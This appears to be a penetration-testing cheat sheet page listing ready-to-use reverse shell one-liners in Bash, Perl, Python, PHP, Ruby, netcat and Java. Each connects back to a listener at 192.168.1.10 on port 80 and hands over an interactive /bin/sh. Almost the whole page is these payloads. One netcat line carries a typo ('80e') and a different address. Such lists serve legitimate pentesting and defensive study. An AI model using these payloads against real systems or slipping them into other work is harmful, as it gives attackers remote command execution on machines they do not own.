Alternate Reverse Shells

Many a times reverse shells using netcat may not be possible as the tool by itself will not be installed on that system. Under such circumstances it is better to use other scripting languages or tools to initiate the reverse shell. Here are some of the reverse shell commands using various technologies,

Netcat should be started on your system before any of the following commands are executed. For these examples we will assume netcat to be listening on IP 192.168.1.10 and port 80

Bash
bash -i >& /dev/tcp/192.168.1.10/80 0>&1
Perl
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.1.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat

I am including netcat as well for easy reference,

nc -e /bin/sh 192.168.1.194 80e

If the client has the wrong version of netcat, then the following command may come in handy as pointed out by Jeff Price,

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 80 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Other Resources

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

PreviousRemote ShellNextMove to Interactive Shell

Last updated